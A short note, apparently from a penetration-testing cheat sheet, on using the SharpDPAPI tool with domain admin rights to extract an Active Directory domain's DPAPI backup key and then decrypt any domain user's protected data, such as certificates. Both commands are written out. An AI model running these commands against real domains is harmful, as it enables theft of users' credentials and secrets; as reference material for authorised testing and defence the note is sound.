# dpapi

Tools like SharpDPAPI can be used to extract the domain Backup Key. Run the following command with DA privileges:

```
SharpDPAPI.exe backupkey /nowrap

```

Once we have the backup key, it can be used to decrypt any domain user's DPAPI protected data. For example, decrypt certificates:

```
SharpDPAPI.exe -args certificates /pvk:<backupkey>
```